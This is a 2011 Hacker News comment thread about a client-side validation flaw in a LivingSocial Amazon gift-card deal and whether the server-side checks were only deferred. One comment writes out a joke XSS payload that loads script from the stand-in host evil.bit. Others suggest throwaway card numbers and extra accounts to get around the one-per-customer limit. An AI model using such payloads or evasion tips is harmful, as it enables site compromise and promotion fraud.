Hacker News new | past | comments | ask | show | jobs | submit login
LivingSocial Hacked (deepgreencrystals.com)
92 points by dknecht on Jan 20, 2011 | hide | past | web | favorite | 28 comments

Fact checking is important:

Tippr.com Guy:

   "If Amazon knew there was a way to buy say 100 vouchers and receive $2000 of 
   Amazon merchandise for $1000, they would probably blow a gasket. 
   Jeff you better sit down. "
livingsocial disclaimer: (I bought one - apparently I could have bought more. :-)

   "* Amazon is not a sponsor of this promotion."
This is a customer acquisition/affiliate/advertising play on living's social's part. Plus, they'll probably make some money on breakage [1] which is a component of all these coupon vendors. Certainly got my attention.

With regards to the exploit - I don't really get it - you don't get the Gift Certificate right away - I still haven't received mine, though I did get an email:

   "Thanks for getting in on this sweet deal from LivingSocial:

   $20 Amazon Gift Card*

   We'll send you an email tomorrow letting you know how you can get 
   your Amazon Gift Card* code"
Doesn't this give LivingSocial the opportunity to validate whether I'm receiving more than one coupon at a time? If all the deals go through this server side validation, does it really matter if the someone tries to play games on the client side and put in 999 coupons (and, supposedly, pays for them) - I'm presuming LivingSocial reserves the right to change that number back to "1" (and probably take their time returning your money)

[1] http://en.wikipedia.org/wiki/Breakage

1. Amazon is the top, major investor in LivingSocial ($175 Million)

2. LivingSocial has already said they are only allowing one GC purchase per credit card (so when they tabulate tomorrow, all this hackery will fail)

3. They are being issued as Amazon vouchers, not really GC, which allows only one voucher per Amazon account. If someone managed to get 100, they would need 100 Amazon accounts.

3. higher numbers sold look better for WOM marketing purposes, even if many of them are culled during the tabulation after the sale ends.

My guess is, LivingSocial know exactly what they are doing.

Citicard lets you generate virtual numbers. So #2 can easily be bypassed.

Ah, the article should have mentioned that you don't get the gift certificates immediately. That means LivingSocial's not completely screwed just yet.

Nonetheless, not having server-side validation built-in indicates pretty bad practice. For one, it causes them a lot of grief and work reversing all the transactions. But further, it indicates that they probably have gaping security flaws laying around waiting to be exploited.

My thoughts exactly. Server side validation is basic. There is nothing special you need to do to make it work and a lot of web frameworks now take care of 99% of that code for you anyways. This makes me think that on the software side of things, they are skipping basic steps. If I were looking, I'd consider SQL injections next. Or even XSS attacks. Yes, my name really is Igor<script src="http://evil.bit/hack.js type="text/javascript"></script>.

Thanks for the Breakage concept. Wonder if it applies to how empty gyms function on unattending membership fees.

According to Business Insider, LivingSocial's CEO's has said this is not a problem: http://www.businessinsider.com/livingsocial-server-flaw-2011...

"Tim O'Shaughnessy: Just saw your post come through based on Martin Tobias' post and he is off on a several things, but in short, there is no widescale problem of users purchasing more than 1 gift card voucher.

Here are some specifics: First, when a user first hits "buy", we do a pre-authorization of their card but hold off on settlement until later in the day after the deal is closed. We generally do this for a variety of reasons, but a primary reason is that if a user happens to earn that day's deal for free through our Me + 3 program, we don't want to have to charge their card back. Instead we wait to see who has earned a free deal and then process the cards.

A by-product of doing the pre-auth first and the settlement later, is that we can do server side validation (i.e. check for gamers) anytime through the day until the settlement occurs and we've reconciled the transaction. What does this mean? It means that today people who think they've "found a loophole" just haven't been told by us yet that they're violating the one purchase per person rule. We intentionally had that happen today because we expected people to game the system and didn't want to get into a game of cat and mouse all day. That 50-75% of the purchases were gamed is laughable.

The "code hack" Martin refers to changes things on the client side, but not our server side. Optically it will look like someone has changed their purchase number, but we have the number already locked on the server side."

That fact that they fixed the problem seems to be counter to the CEO's statement that it wasn't actually a problem.

They clearly weren't validating all of the form inputs on the server side. Hopefully this was a learning experience for the engineering team.

You have a 24 hour window for a deal like this and you know it costs you $10 for everyone who games the system. So you let the hackers think they've won then after the 24 hours is up, reveal that they've lost. Instead of finding creative and more difficult ways to game the system, the hackers wasted their 24 hours partying and getting drunk and so LivingSocial wins.

Probably not exactly how it went down, but it's a good story.

Honest question to fellow hackers and entrepreneurs: Do we have to take every opportunity to put down your competition? Are there not enough venues to market yourself?

Wouldn't a simple post like this be enough? LivingSocial does not guarantee that you get what you ordered like Tippr does.

I'd hardly call it "hacked". The post is oddly smug to claim that LivingSocial got gamed easily and their "design" is flawed and that their own solution is better.

Meh. I'll pass. Such a blog post about a competitor isn't the best way to brag about your own product.

LivingSocial has already said that they are only going to allow one GC purchase per credit card number.

So multiple purchases under one account, or multiple accounts are going to fail when they tabulate tomorrow.

Also, they are being issued as Amazon vouchers, not really GC, which allows only one voucher per Amazon account. If someone managed to get 100, they would need 100 Amazon accounts.

I know the post is by a competitor, but wouldn't telling Living Social about it first and giving them time to fix it before blogging be the "right thing" to do?

This really spooked me at first ... Just by reading the title, my first thought was that their servers got hacked maliciously and my financial data I just added today was compromised. I'm glad to see it was something more innocent :)

Talk about bad PR ... that'd be the worst they could get, if they got hacked on the day they're likely seeing their most signups ever!

Don't get too excited.

LivingSocial disabled this already (the trick doesn't work any more), and all people who tried this trick earlier today will simply get an email tomorrow saying that they are not eligible because they ordered more than 1 gift certificate.

There's simply too much money at stake for LivingSocial not to make sure that people only get 1 gift certificate each.

LivingSocial don't process the credit cards until after the deal is closed.

It wouldn't take 10 minutes to have an engineer interrogate the database to raise any orders that have a quantity greater than 1 and/or a total amount more than $10.

To claim that LivingSocial has been "hacked" is sensationalism. While I think it was a low blow, I can understand why a non-technical CEO would try this stunt but I'd have expected more sense from a technical person who should know how easy it would be to see this happening on LivingSocial's back end.

Doesn't appear to work now at least. Submitting any positive number as the value for purchase_order_quantity still results in the website reporting that I'll be charged for one.

LivingSocial didn't skip server-side validation - they delayed it. Now they can identify cheaters who were suckered by false reports of a loophole. Doesn't look so dumb to me.

I think this brings up an interesting point of discussion: what should sites do now and what should they do later?

In this case, a quick server-side check that did the same thing as a client-side validation seems like a no brainier, but what about bigger, more complex actions?

What kinds of actions are you guys deferring while actually telling the customer something else (and notifying them later if something ultimately fails)?

Well, the final server side purchase shows the 1 card, $10 amount, so a fair amount of server side validation is being done.

They fixed it a few hours ago. My account is still showing I purchased a 100.

If you really wanted to get multiple deals, wouldn't it make more sense to just make another LivingSocial account with a different e-mail address?

That way if/when they invalidate all of the orders from people who ordered more than 1, you won't miss out on the deal.

They'll probably check billing methods as well, so you'd have to generate a lot of extra credit cards accounts. And they could ensure that the #'s for these can only be used once by one amazon account or shipping address.

Yeah, I wouldn't be surprised if Amazon restricts your account to one of these gift certificates somehow. The deal description said "no gifting allowed."

Still, a separate e-mail address, credit card, and Amazon account would be an almost surefire way to get a multiple deals. But anything past 2 or 3 would get to the point of just wasting your time.

Some credit cards allow you to generate throwaway credit card numbers, and you could sell the gift certificates to people with different addresses.

My main reaction to this story is that, after months of getting crappy offers from LivingSocial and cancelling my subscription to them, they finally offer something good.

The article says did they client-side validation to ensure that a customer could only get one of a special offer. Sheesh. Security 101.

If anybody's still reading, I'm curious why this got voted down. I thought I was adding value by pointing out the specific vulnerability, and that it was a basic security flaw. Was it too sarcastic?

Applications are open for YC Summer 2019

Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact